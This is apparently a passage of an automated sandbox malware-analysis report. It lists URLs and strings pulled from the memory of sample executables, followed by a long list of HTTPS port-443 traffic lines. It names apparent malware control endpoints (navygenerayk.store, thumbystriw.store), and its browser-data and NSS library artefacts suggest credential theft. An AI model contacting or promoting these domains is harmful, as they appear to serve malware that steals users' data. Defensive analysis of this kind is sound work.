Source: 167c7bdf2f.exe, 00000018.00000002.2875232796.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000002.2879651443.00000000054D0000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2869088877.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2868724732.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3022853812.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3012450017.0000000001373000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2938921647.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3036186870.0000000001372000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939046647.0000000001355000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3226866387.00000000058D2000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3176586862.0000000000ECC000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api(
Source: 167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apid
Source: 167c7bdf2f.exe, 00000018.00000002.2875232796.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2869088877.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2868724732.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3036405092.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apie
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apieuf
Source: 167c7bdf2f.exe, 00000018.00000002.2875232796.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2869088877.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2868724732.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apif0
Source: 167c7bdf2f.exe, 0000001D.00000003.3022853812.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3012450017.0000000001373000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3036186870.0000000001372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apin/
Source: 167c7bdf2f.exe, 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/c
Source: 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/hs
Source: 167c7bdf2f.exe, 00000021.00000002.3303459395.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/s
Source: 167c7bdf2f.exe, 00000018.00000003.2812117426.00000000054DC000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811704797.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/~
Source: 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store:443/api
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store:443/apiK
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store:443/apiicrosoft
Source: 000003.log3.7.dr	String found in binary or memory: https://ntp.msn.com/
Source: Session_13375791197554494.7.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: chromecache_498.4.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_498.4.dr	String found in binary or memory: https://plus.googleapis.com
Source: 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2328117934.0000000023C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thumbystriw.store/api
Source: chromecache_498.4.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, HIDAFHDH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_498.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_498.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/AEGDHIDGDHDA
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2328117934.0000000023C01000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2801391401.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2962543263.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2328117934.0000000023C01000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2801391401.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2962543263.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/ds:
Source: file.exe, 00000000.00000003.2328117934.0000000023C01000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2801391401.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2962543263.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
